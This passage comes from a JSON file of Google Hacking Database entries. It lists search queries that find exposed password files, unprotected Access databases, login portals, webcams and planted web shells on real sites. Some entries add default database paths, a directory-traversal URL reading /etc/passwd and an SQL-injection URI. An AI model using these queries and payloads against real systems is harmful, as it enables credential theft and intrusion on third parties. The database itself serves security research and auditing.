"http://www.google.com/search?hl=en&q=ext%3Aasp+%22powered+by+DUForum%22+inurl%3A%28messages%7Cdetails%7Clogin%7Cdefault%7Cregister%29+-site%3Aduware.com", "shortDescription": "ext:asp \"powered by DUForum\" inurl:(messages|details|login|default|register) -site:duware.com", "textualDescription": "DUForum is one of those free forum software packages. The database location is determined by the config file \"connDUforumAdmin.asp\", but the installation instructions don't recommend changing it. Ouch..Database location is: http://server/duforum/_private/DUforum.mdb" }, { "signatureReferenceNumber": "678", "link": "https://www.exploit-db.com/ghdb/678/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22enable+secret+5+%24%22", "shortDescription": "intext:\"enable secret 5 $\"", "textualDescription": "sometimes people make mistakes and post their cisco configs on \"help sites\" and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string." }, { "signatureReferenceNumber": "679", "link": "https://www.exploit-db.com/ghdb/679/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Apostfixadmin+intitle%3A%22postfix+admin%22+ext%3Aphp", "shortDescription": "inurl:postfixadmin intitle:\"postfix admin\" ext:php", "textualDescription": "Postfix Admin login pages. Duh." }, { "signatureReferenceNumber": "680", "link": "https://www.exploit-db.com/ghdb/680/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3Acgi+inurl%3Aeditcgi.cgi+inurl%3Afile%3D", "shortDescription": "ext:cgi inurl:editcgi.cgi inurl:file=", "textualDescription": "This was inspired by the K-Otic report. Only two results at time of writing. The cgi script lets you view any file on the system, including /etc/.. (guess it ;)http://www.k-otik.com/exploits/08242004.Axis.sh.php" }, { "signatureReferenceNumber": "681", "link": "https://www.exploit-db.com/ghdb/681/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Aaxis-cgi", "shortDescription": "inurl:axis-cgi", "textualDescription": "Just another search string to detect the infamous Axis netcams. This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)" }, { "signatureReferenceNumber": "682", "link": "https://www.exploit-db.com/ghdb/682/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=filetype%3Ans1+ns1", "shortDescription": "filetype:ns1 ns1", "textualDescription": "Netstunbler files contain information about the wireless network. For a cleanup add stuff like: +\"Creator\" +\"Format\" +\"DateGMT\"." }, { "signatureReferenceNumber": "683", "link": "https://www.exploit-db.com/ghdb/683/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Starting+SiteZAP+6.0%22", "shortDescription": "\"Starting SiteZAP 6.0\"", "textualDescription": "siteZap webcams !" }, { "signatureReferenceNumber": "684", "link": "https://www.exploit-db.com/ghdb/684/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22phpPgAdmin+-+Login%22+Language&hl=en&lr=&c2coff=1&start=10&sa=N", "shortDescription": "intitle:\"phpPgAdmin - Login\" Language", "textualDescription": "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services" }, { "signatureReferenceNumber": "685", "link": "https://www.exploit-db.com/ghdb/685/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=filetype%3Aconfig+web.config+-CVS", "shortDescription": "filetype:config web.config -CVS", "textualDescription": "Through Web.config an IIS adminstrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site. This file can hold a plaintext password in the worst case or just reveil the full path info on a 404 error." }, { "signatureReferenceNumber": "686", "link": "https://www.exploit-db.com/ghdb/686/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=++filetype%3Amyd+myd+-CVS&btnG=Search", "shortDescription": "filetype:myd myd -CVS", "textualDescription": "MySQL stores its data for each database in individual files with the extension MYD.An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database." }, { "signatureReferenceNumber": "687", "link": "https://www.exploit-db.com/ghdb/687/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.de/search?q=%22Obtenez+votre+forum+Aztek%22+-site%3Aforum-aztek.com&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "\"Obtenez votre forum Aztek\" -site:forum-aztek.com", "textualDescription": "Atztek Forum is a french forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.http://www.securityfocus.com/bid/11654" }, { "signatureReferenceNumber": "688", "link": "https://www.exploit-db.com/ghdb/688/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&q=intext%3A%28%22UBB.threads%E2%84%A2+6.2%22%7C%22UBB.threads%E2%84%A2+6.3%22%29+intext%3A%22You+*+not+logged+*%22+-site%3Aubbcentral.com", "shortDescription": "intext:(\"UBB.threads\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6.2\"|\"UBB.threads\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6.3\") intext:\"You * not logged *\" -site:ubbcentral.com", "textualDescription": "UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:http://www.k-otik.com/exploits/20041116.r57ubb.pl.php" }, { "signatureReferenceNumber": "689", "link": "https://www.exploit-db.com/ghdb/689/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%2FSiteChassisManager%2F+&btnG=Search", "shortDescription": "inurl:/SiteChassisManager/", "textualDescription": "Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.http://www.securityfocus.com/bid/11434/discussion/" }, { "signatureReferenceNumber": "690", "link": "https://www.exploit-db.com/ghdb/690/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Land+Down+Under+601%22", "shortDescription": "\"Powered by Land Down Under 601\"", "textualDescription": "sQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. An exploit exists on the internet, search google." }, { "signatureReferenceNumber": "691", "link": "https://www.exploit-db.com/ghdb/691/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22EvoCam%22+inurl:%22webcam.html%22&hl=en&lr=&c2coff=1&start=0&sa=Nurl", "shortDescription": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "textualDescription": "Evocams !" }, { "signatureReferenceNumber": "692", "link": "https://www.exploit-db.com/ghdb/692/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3Adirectorypro.cgi", "shortDescription": "inurl:directorypro.cgi", "textualDescription": "A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00http://www.securityfocus.com/bid/2793" }, { "signatureReferenceNumber": "693", "link": "https://www.exploit-db.com/ghdb/693/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22PhpMyExplorer%22+inurl%3A%22index.php%22+-cvs", "shortDescription": "intitle:\"PhpMyExplorer\" inurl:\"index.php\" -cvs", "textualDescription": "PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory." }, { "signatureReferenceNumber": "694", "link": "https://www.exploit-db.com/ghdb/694/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Acal_make.pl&btnG=Search", "shortDescription": "inurl:cal_make.pl", "textualDescription": "A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory. http://www.securityfocus.com/bid/2663" }, { "signatureReferenceNumber": "695", "link": "https://www.exploit-db.com/ghdb/695/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%2Fwebedit.*+intext%3AWebEdit+Professional+-html", "shortDescription": "inurl:/webedit.* intext:WebEdit Professional -html", "textualDescription": "WebEdit is a content management system. This is the login portal search." }, { "signatureReferenceNumber": "696", "link": "https://www.exploit-db.com/ghdb/696/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:%22Apache::Status%22+(inurl:server-status+%7C+inurl:status.html+%7C+inurl:apache.html)&num=100", "shortDescription": "intitle:\"Apache::Status\" (inurl:server-status | inurl:status.html | inurl:apache.html)", "textualDescription": "The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm" }, { "signatureReferenceNumber": "697", "link": "https://www.exploit-db.com/ghdb/697/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+PowerPortal+v1.3%22", "shortDescription": "\"Powered by PowerPortal v1.3\"", "textualDescription": "PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1http://www.securityfocus.com/bid/11681" }, { "signatureReferenceNumber": "698", "link": "https://www.exploit-db.com/ghdb/698/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=%22Microsoft+%28R%29+Windows+*+%28TM%29+Version+*+DrWtsn32+Copyright+%28C%29%22+ext%3Alog", "shortDescription": "\"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)\" ext:log", "textualDescription": "This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well." }, { "signatureReferenceNumber": "699", "link": "https://www.exploit-db.com/ghdb/699/", "category": "Files containing juicy info", "querystring": "http://www.google.co.uk/search?q=inurl%3Areport+%22EVEREST+Home+Edition+%22&hl=en&safe=off", "shortDescription": "inurl:report \"EVEREST Home Edition \"", "textualDescription": "Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easilly gone under virtually any of the lists as it just give out Soooo much info. I can for instance find out the admin username (not just the adin every user) and also if it password protected and if the password ever expires plus is it a current user account, also do the same for any guest accounts, Ok nice and easy how about the O/S and all the Mapped Drive locations all there along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff. This one just gives out to much to list, so go have a look and see what you can find." }, { "signatureReferenceNumber": "700", "link": "https://www.exploit-db.com/ghdb/700/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&q=%22powered+by+minibb%22+%2Dsite%3Awww%2Eminibb%2Enet+%2Dintext%3A1%2E7f", "shortDescription": "\"powered by minibb\" -site:www.minibb.net -intext:1.7f", "textualDescription": "miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. miniBB versions prior to 1.7f are reported prone to this issue.http://www.securityfocus.com/bid/11688" }, { "signatureReferenceNumber": "701", "link": "https://www.exploit-db.com/ghdb/701/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=%22powered+by+ducalendar%22+-site%3Aduware.com", "shortDescription": "\"powered by ducalendar\" -site:duware.com", "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Ducalendar it's: /ducalendar/_private/ducalendar.mdb" }, { "signatureReferenceNumber": "702", "link": "https://www.exploit-db.com/ghdb/702/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=%22Powered+by+Duclassified%22+-site%3Aduware.com", "shortDescription": "\"Powered by Duclassified\" -site:duware.com", "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb" }, { "signatureReferenceNumber": "703", "link": "https://www.exploit-db.com/ghdb/703/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&&q=%22Powered+by+Dudirectory%22+-site%3Aduware.com", "shortDescription": "\"Powered by Dudirectory\" -site:duware.com", "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For DuDirectory it's: /dudirectory/_private/dudirectory.mdb" }, { "signatureReferenceNumber": "704", "link": "https://www.exploit-db.com/ghdb/704/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Duclassified%22+-site%3Aduware.com+%22DUware+All+Rights+Reserved%22&btnG=Search", "shortDescription": "\"Powered by Duclassified\" -site:duware.com \"DUware All Rights reserved\"", "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb" }, { "signatureReferenceNumber": "705", "link": "https://www.exploit-db.com/ghdb/705/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+duclassmate%22+-site%3Aduware.com", "shortDescription": "\"powered by duclassmate\" -site:duware.com", "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassmate it's: /duclassmate/_private/duclassmate.mdb" }, { "signatureReferenceNumber": "706", "link": "https://www.exploit-db.com/ghdb/706/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=intitle%3Adupics+inurl%3A%28add.asp+%7C+default.asp+%7C+view.asp+%7C+voting.asp%29+-site%3Aduware.com", "shortDescription": "intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com", "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Dupics rename location to ../_private/dupics.mdb" }, { "signatureReferenceNumber": "707", "link": "https://www.exploit-db.com/ghdb/707/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=%22powered+by+dudownload%22+-site%3Aduware.com", "shortDescription": "\"powered by dudownload\" -site:duware.com", "textualDescription": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. rename ../xxx to ../_private/dudownload.mdb" }, { "signatureReferenceNumber": "708", "link": "https://www.exploit-db.com/ghdb/708/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22ipcop+-+main%22&filter=0", "shortDescription": "intitle:\"ipcop - main\"", "textualDescription": "IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)" }, { "signatureReferenceNumber": "709", "link": "https://www.exploit-db.com/ghdb/709/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Smoothwall+Express%22+inurl%3Acgi-bin+%22up+*+days%22", "shortDescription": "intitle:\"Smoothwall Express\" inurl:cgi-bin \"up * days\"", "textualDescription": "smoothwall is a firewall operating system distribution based on Linux. (Not many results for this search at the moment)." }, { "signatureReferenceNumber": "710", "link": "https://www.exploit-db.com/ghdb/710/", "category": "Footholds", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=filetype%3Aphp+HAXPLORER+%22Server+Files+Browser%22&btnG=Search", "shortDescription": "filetype:php HAXPLORER \"Server Files Browser\"", "textualDescription": "Haxplorer is a webbased filemanager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files. As the script's name says it is mostly installed by hackers" }, { "signatureReferenceNumber": "711", "link": "https://www.exploit-db.com/ghdb/711/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Acoranto.cgi+intitle%3ALogin+%28Authorized+Users+Only%29", "shortDescription": "inurl:coranto.cgi intitle:Login (Authorized Users Only)", "textualDescription": "Coranto is one of the most powerful Content Management System (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site, it supports multiple browsers, multiple operating systems, produces standard compliant html, has a huge variety of excellent features and is fully extendible via addons. It is free for use on any site, personal or commercial!" }, { "signatureReferenceNumber": "712", "link": "https://www.exploit-db.com/ghdb/712/", "category": "Network or vulnerability data", "querystring": "http://www.google.de/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=+filetype%3Alog+intext%3A%22ConnectionManager2%22&btnG=Search", "shortDescription": "filetype:log intext:\"ConnectionManager2\"", "textualDescription": "ISDNPM 3.x for OS/2-Dialer log files.These files contain sensitive info like ip addresses, phone numbers of dial in servers, usernames and password hashes - Everything you need to dial in...." }, { "signatureReferenceNumber": "713", "link": "https://www.exploit-db.com/ghdb/713/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:%22Videoconference+Management+System%22+ext:htm&hl=en&lr=&c2coff=1&start=0&sa=N", "shortDescription": "intext:\"Videoconference Management System\" ext:htm", "textualDescription": "Tandberg video conferencing appliancesThe webinterface enables you to drop calls and to browse the internal phonebook" }, { "signatureReferenceNumber": "714", "link": "https://www.exploit-db.com/ghdb/714/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=ext%3Atxt+%22Final+encryption+key%22+&btnG=Search", "shortDescription": "ext:txt \"Final encryption key\"", "textualDescription": "IPSec debug/log data which contains user data and password hashes.Can be used to crack passwords." }, { "signatureReferenceNumber": "715", "link": "https://www.exploit-db.com/ghdb/715/", "category": "Files containing passwords", "querystring": "http://www.google.de/search?hl=en-BR&ie=ISO-8859-1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=filetype%3Alog+%22See+%60ipsec+--copyright%22&btnG=Pesquisar&meta=", "shortDescription": "filetype:log \"See `ipsec --copyright\"", "textualDescription": "BARF log filesMan page:Barf outputs (on standard output) a collection of debugging information (contents of files, selections from logs, etc.) related to the IPSEC encryption/authentication system. It is primarily a convenience for remote debugging, a single command which packages up (and labels) all information that might be relevant to diagnosing a problem in IPSEC." }, { "signatureReferenceNumber": "716", "link": "https://www.exploit-db.com/ghdb/716/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Welcome+To+Xitami%22+-site%3Axitami.com&btnG=Google+Search", "shortDescription": "intitle:\"Welcome To Xitami\" -site:xitami.com", "textualDescription": "Default Xitami installationAdditionally every default installation of Xitami webserver has a testscript which provides a lot of information about the server.It can be run by entering the following urlhttp://server/cgialias/testcgi.exe(cgialias = is usually /cgi-bin/)" }, { "signatureReferenceNumber": "717", "link": "https://www.exploit-db.com/ghdb/717/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Atestcgi+xitami&btnG=Search", "shortDescription": "inurl:testcgi xitami", "textualDescription": "Testpage / webserver environmentThis is the test cgi for xitami webserver. It shows the webserver's complete environment. Contains very interesting information which can be used a first step into the server." }, { "signatureReferenceNumber": "718", "link": "https://www.exploit-db.com/ghdb/718/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle%3A%22DocuShare%22+inurl%3A%22docushare%2Fdsweb%2F%22+-faq+-gov+-edu", "shortDescription": "intitle:\"DocuShare\" inurl:\"docushare/dsweb/\" -faq -gov -edu", "textualDescription": "some companies use a Xerox Product called DocuShare. The problem with this is by default guest access is enabled and it appears a lot of companies either don't care or don't know." }, { "signatureReferenceNumber": "719", "link": "https://www.exploit-db.com/ghdb/719/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22Powered+By%3A+TotalIndex%22+intitle%3A%22TotalIndex%22", "shortDescription": "intext:\"Powered By: TotalIndex\" intitle:\"TotalIndex\"", "textualDescription": "TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring default index page of a site which lists the files in an indexed folder. It's not PW protected so an attacker can browse the files and take what they want." }, { "signatureReferenceNumber": "720", "link": "https://www.exploit-db.com/ghdb/720/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl%3A%22GRC.DAT%22+intext%3A%22password%22", "shortDescription": "inurl:\"GRC.DAT\" intext:\"password\"", "textualDescription": "symantec Norton Anti-Virus Corporate Edition data file containing encrypted passwords." }, { "signatureReferenceNumber": "721", "link": "https://www.exploit-db.com/ghdb/721/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=inurl%3Aphp.exe+filetype%3Aexe+-example.com", "shortDescription": "inurl:php.exe filetype:exe -example.com", "textualDescription": "It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it is enabled), even across drives. (Note: The GHDB has another search for this file based on directorly listings, try them both)" }, { "signatureReferenceNumber": "722", "link": "https://www.exploit-db.com/ghdb/722/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=50&q=intitle%3A%22PHP+Advanced+Transfer%22+inurl%3A%22login.php%22", "shortDescription": "intitle:\"PHP Advanced Transfer\" inurl:\"login.php\"", "textualDescription": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download & upload manager\". This is a search for the login pages." }, { "signatureReferenceNumber": "723", "link": "https://www.exploit-db.com/ghdb/723/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22PHP+Advanced+Transfer%22+%28inurl%3Aindex.php+%7C+inurl%3Ashowrecent.php+%29", "shortDescription": "intitle:\"PHP Advanced Transfer\" (inurl:index.php | inurl:showrecent.php )", "textualDescription": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download & upload manager\". This is a search for the main and recently changed files pages." }, { "signatureReferenceNumber": "724", "link": "https://www.exploit-db.com/ghdb/724/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=200&q=%22Output+produced+by+SysWatch+*%22", "shortDescription": "\"Output produced by SysWatch *\"", "textualDescription": "sysWatch is a CGI to display current information about your UNIX system. It can display drive partitions, disk or drive usage, as well as resource hogs (running processes) and last but not lease it shows what current users are doing online (including sh scripts etc..)." }, { "signatureReferenceNumber": "725", "link": "https://www.exploit-db.com/ghdb/725/", "category": "Footholds", "querystring": "http://www.google.com/search?q=PHPKonsole+PHPShell++filetype%3Aphp+-echo", "shortDescription": "PHPKonsole PHPShell filetype:php -echo", "textualDescription": "PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you..." }, { "signatureReferenceNumber": "726", "link": "https://www.exploit-db.com/ghdb/726/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=20&q=%22Phorum+Admin%22+%22Database+Connection%22+inurl%3Aforum+inurl%3Aadmin", "shortDescription": "\"Phorum Admin\" \"Database Connection\" inurl:forum inurl:admin", "textualDescription": "Phorum admin pagesThis either shows Information leakage (path info) or it shows Unprotected Admin pages." }, { "signatureReferenceNumber": "727", "link": "https://www.exploit-db.com/ghdb/727/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=%22Warning%3A+mysql_query%28%29%22+%22invalid+query%22&btnG=Search", "shortDescription": "\"Warning: mysql_query()\" \"invalid query\"", "textualDescription": "MySQL query errors revealing database schema and usernames." }, { "signatureReferenceNumber": "728", "link": "https://www.exploit-db.com/ghdb/728/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3A%22%2Fcgi-bin%2Floadpage.cgi%3Fuser_id%3D%22&btnG=Google-Suche&meta=", "shortDescription": "inurl:\"/cgi-bin/loadpage.cgi?user_id=\"", "textualDescription": "Description:EZshopper is a full-featured shopping cart program. loadpage.cgi of EZshopper allows Directory Traversal http://www.securityfocus.com/bid/2109" }, { "signatureReferenceNumber": "729", "link": "https://www.exploit-db.com/ghdb/729/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl%3A%22ipp%2Fpdisplay.htm%22", "shortDescription": "inurl:\"ipp/pdisplay.htm\"", "textualDescription": "Providing a standout printing solution, Novell iPrint offers secure print services that extend across multiple networks and operating systems\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009dbringing the power of the Net to your business environment. This search locates various online printers." }, { "signatureReferenceNumber": "730", "link": "https://www.exploit-db.com/ghdb/730/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=filetype:mdb+inurl:%22news/news%22", "shortDescription": "filetype:mdb inurl:\"news/news\"", "textualDescription": "Web Wiz Site News unprotected database holds config and admin information in a microsoft access database in news/news.mdb. This information is almost always unprotected." }, { "signatureReferenceNumber": "731", "link": "https://www.exploit-db.com/ghdb/731/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22View+Img%22+inurl:viewimg.php", "shortDescription": "intitle:\"View Img\" inurl:viewimg.php", "textualDescription": "It is reported that the 'viewing.php' script does not properly validate user-supplied input in the 'path' variable. A remote user can submit a specially crafted URL to view a list of files within an arbitrary directory. See http://securitytracker.com/alerts/2004/Nov/1012312.html for more information." }, { "signatureReferenceNumber": "732", "link": "https://www.exploit-db.com/ghdb/732/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle%3A%22Resin+Default+Home+Page%22", "shortDescription": "intitle:\"Resin Default Home Page\"", "textualDescription": "Resin provides a fast standalone web server. This search locates those servers based on the title of the default page." }, { "signatureReferenceNumber": "733", "link": "https://www.exploit-db.com/ghdb/733/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:%22Storage+Management+Server+for%22+intitle:%22Server+Administration%22", "shortDescription": "intext:\"Storage Management Server for\" intitle:\"Server Administration\"", "textualDescription": "These pages can reveal information about the operating system and patch level, as well as providing a login portal for hackers to attack. \"As part of the IBM TotalStorage\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae Open Software Family, IBM Tivoli Storage (ADSM) Manager protects your organization's data from hardware failures and other errors by storing backup and archive copies of data on offline storage.\"" }, { "signatureReferenceNumber": "734", "link": "https://www.exploit-db.com/ghdb/734/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&q=filetype%3Apl+-intext%3A%22%2Fusr%2Fbin%2Fperl%22+inurl%3Awebcal+%28inurl%3Awebcal+%7C+inurl%3Aadd+%7C+inurl%3Adelete+%7C+inurl%3Aconfig%29", "shortDescription": "filetype:pl -intext:\"/usr/bin/perl\" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)", "textualDescription": "WebCal allows you to create and maintain an interactive events calendar or scheduling system on your Web site. The file names explain themselves, but don't abuse the faulty admins." }, { "signatureReferenceNumber": "735", "link": "https://www.exploit-db.com/ghdb/735/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&q=site%3Aups.com+intitle%3A%22Ups+Package+tracking%22+intext%3A%221Z+%23%23%23+%23%23%23+%23%23+%23%23%23%23+%23%23%23+%23%22&btnG=Search", "shortDescription": "site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"", "textualDescription": "Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.-Digital Spirit" }, { "signatureReferenceNumber": "736", "link": "https://www.exploit-db.com/ghdb/736/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=intitle%3A%22twiki%22+inurl%3A%22TWikiUsers%22", "shortDescription": "intitle:\"twiki\" inurl:\"TWikiUsers\"", "textualDescription": "TWiki has many security problems, depeding on the version installed. TWiki, is a flexible, powerful, and easy to use enterprise collaboration platform. It is a structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet or on the internet. Web content can be created collaboratively by using just a browser. Developers can create new web applications based on a Plugin API." }, { "signatureReferenceNumber": "737", "link": "https://www.exploit-db.com/ghdb/737/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&q=%2B%22Powered+by+Invision+Power+Board+v2.0.0..2%22", "shortDescription": "+\"Powered by Invision Power Board v2.0.0..2\"", "textualDescription": "A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query.http://www.securityfocus.com/bid/11719" }, { "signatureReferenceNumber": "738", "link": "https://www.exploit-db.com/ghdb/738/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3Agho+gho", "shortDescription": "ext:gho gho", "textualDescription": "Norton Ghost allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!" }, { "signatureReferenceNumber": "739", "link": "https://www.exploit-db.com/ghdb/739/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3Apqi+pqi+-database", "shortDescription": "ext:pqi pqi -database", "textualDescription": "PQ DriveImage allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!" }, { "signatureReferenceNumber": "740", "link": "https://www.exploit-db.com/ghdb/740/", "category": "Files containing juicy info", 